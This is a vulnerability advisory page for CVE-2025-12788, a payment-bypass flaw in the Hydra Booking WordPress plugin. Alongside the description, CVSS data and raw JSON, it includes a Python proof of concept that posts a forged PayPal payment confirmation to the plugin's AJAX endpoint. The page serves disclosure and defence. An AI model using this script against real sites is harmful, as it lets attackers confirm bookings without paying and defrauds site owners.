Security Vulnerability Report
CVE-2025-12788 CVSS 5.3 MEDIUM

CVE-2025-12788

Published: 2025-11-11 11:15:35
Last Modified: 2026-04-15 00:35:42

Description

The Hydra Booking — Appointment Scheduling & Booking Calendar plugin for WordPress is vulnerable to unauthenticated payment bypass due to missing payment verification in all versions up to, and including, 1.1.27. The plugin's tfhb_meeting_paypal_payment_confirmation_callback function accepts client-controlled payment confirmation data without verifying it server-side against PayPal's API. This makes it possible for unauthenticated attackers to bypass payment requirements and confirm bookings as paid without any actual payment transaction occurring.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Hydra Booking plugin <= 1.1.27 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2025-12788 PoC - Hydra Booking Payment Bypass
# Target: WordPress site with Hydra Booking plugin < 1.1.28

target_url = "http://target-wordpress-site.com"
booking_id = "123"  # Replace with actual booking ID

# Vulnerable endpoint - PayPal payment confirmation callback
endpoint = f"{target_url}/wp-admin/admin-ajax.php"

# Attack payload - Fake payment confirmation without actual PayPal transaction
payload = {
    "action": "tfhb_meeting_paypal_payment_confirmation_callback",
    "booking_id": booking_id,
    "payment_status": "Completed",      # Fake status
    "transaction_id": "FAKE_TX_12345",  # Non-existent transaction
    "amount": "100.00",
}

print("[*] Sending payment bypass request...")
response = requests.post(endpoint, data=payload)

if response.status_code == 200:
    print("[+] Payment bypass request sent successfully")
    print(f"[*] Response: {response.text}")
else:
    print(f"[-] Request failed with status: {response.status_code}")

# Note: This PoC demonstrates the vulnerability concept.
# Actual exploitation requires identifying valid booking IDs and endpoints.

References

https://plugins.trac.wordpress.org/changeset/3392864/hydra-booking/tags/1.1.28/app/Shortcode/HydraBookingShortcode.php?old=3392467&old_path=hydra-booking%2Ftags%2F1.1.27%2Fapp%2FShortcode%2FHydraBookingShortcode.php
https://www.wordfence.com/threat-intel/vulnerabilities/id/b49ce4a2-52ad-4824-86fc-5edd2e33802d?source=cve

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12788", "sourceIdentifier": "[email protected]", "published": "2025-11-11T11:15:34.890", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Hydra Booking — Appointment Scheduling & Booking Calendar plugin for WordPress is vulnerable to missing payment verification to unauthenticated payment bypass in all versions up to, and including, 1.1.27. This is due to the plugin accepting client-controlled payment confirmation data in the tfhb_meeting_paypal_payment_confirmation_callback function without server-side verification with PayPal's API. This makes it possible for unauthenticated attackers to bypass payment requirements and confirm bookings as paid without any actual payment transaction occurring."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-602"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3392864/hydra-booking/tags/1.1.28/app/Shortcode/HydraBookingShortcode.php?old=3392467&old_path=hydra-booking%2Ftags%2F1.1.27%2Fapp%2FShortcode%2FHydraBookingShortcode.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b49ce4a2-52ad-4824-86fc-5edd2e33802d?source=cve", "source": "[email protected]"}]}}